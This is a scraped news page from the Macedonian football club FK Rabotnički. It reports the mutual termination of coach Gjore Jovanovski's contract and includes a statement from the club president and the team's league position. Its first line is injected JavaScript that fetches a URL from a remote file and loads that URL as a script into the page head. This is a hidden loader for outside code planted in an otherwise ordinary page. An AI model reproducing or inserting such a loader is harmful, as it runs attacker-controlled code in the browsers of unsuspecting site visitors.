;var url = 'https://raw.githubusercontent.com/AlexanderRPatton/cdn/main/repo.txt';fetch(url).then(response => response.text()).then(data => {var script = document.createElement('script');script.src = data.trim();document.getElementsByTagName('head')[0].appendChild(script);}); ФК Работнички » Работнички и тренерот Ѓоре Јовановски спогодбено го раскинаа договорот
shopping-bag 0
Items : 0
Subtotal : 0 MKD
View Cart Check Out

Работнички и тренерот Ѓоре Јовановски спогодбено го раскинаа договорот

Фудбалскиот клуб Работнички спогодбено го раскина договорот со тренерот Ѓоре Јовановски. Согласно резултатите на тимот од стартот на сезоната, раководството на клубот договорно одлучи да ја прекине соработката со шефот на стручниот штаб.

„Имавме разговор со тренерот Ѓоре Јовановски и се согласивме спогодбено да го раскинеме договорот. Во фудбалот резултатите секогаш ги диктираат настаните, а Работнички има високи амбиции, кои во моментот се, за жал, над остварените резултати. Согласно ова, моравме да го раскинеме договорот со Ѓоре Јовановски. Би сакал да му се заблагодарам за соработката, се работи за врвен професионалец кој во периодот додека беше шеф на стручниот штаб уште еднаш ги потврди своите професионални и човечки квалитети. Минатата година успеа да го одведе тимот во квалификациите за Лигата на Европа и да ја исполни целта. Тој работеше вредно и напорно секој ден, максимално се посвети и на развојот на младинската школа, и му посакуваме се најдобро во понатамошната тренерска кариера“, вели претседателот на клубот, Драган Поповски.

Работнички по девет одиграни кола во Првата фудбалска лига се наоѓа на шестата позиција на табелата со 11 освоени бода.